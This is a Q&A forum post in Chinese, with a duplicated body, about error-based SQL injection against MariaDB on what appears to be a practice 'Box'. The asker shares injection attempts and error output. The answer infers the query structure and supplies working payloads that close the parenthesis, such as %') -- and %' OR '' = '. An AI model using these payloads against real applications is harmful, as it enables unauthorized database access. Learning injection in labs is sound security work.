如何在 MariaDB Error Based SQL Injection 中找到正确的语法?
How to find out the right syntax in MariaDB Error Based SQL Injection?
我正在尝试将 SQL 语句注入 Box。
我有以下注入点:
example.com/?o=1&page=app
当我注入 1' 时,我收到以下错误消息:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
我试图注入以下内容:
1' ORDER BY 1 --
我仍然收到错误消息,我不知道如何关闭语句:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1
我做错了什么?
感谢您的回答!
鉴于当您尝试 1' 查询时包含 '1'' 看来原始查询是这样的:
... '5' or dest like '$o') LIMIT 10
例如
SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10
要使其成为有效查询,您需要关闭括号。
例如%') --,给予:
SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10
或%' OR '' = ',给出:
SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10
我正在尝试将 SQL 语句注入 Box。 我有以下注入点:
example.com/?o=1&page=app
当我注入 1' 时,我收到以下错误消息:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
我试图注入以下内容:
1' ORDER BY 1 --
我仍然收到错误消息,我不知道如何关闭语句:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1
我做错了什么? 感谢您的回答!
鉴于当您尝试 1' 查询时包含 '1'' 看来原始查询是这样的:
... '5' or dest like '$o') LIMIT 10
例如
SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10
要使其成为有效查询,您需要关闭括号。
例如%') --,给予:
SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10
或%' OR '' = ',给出:
SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10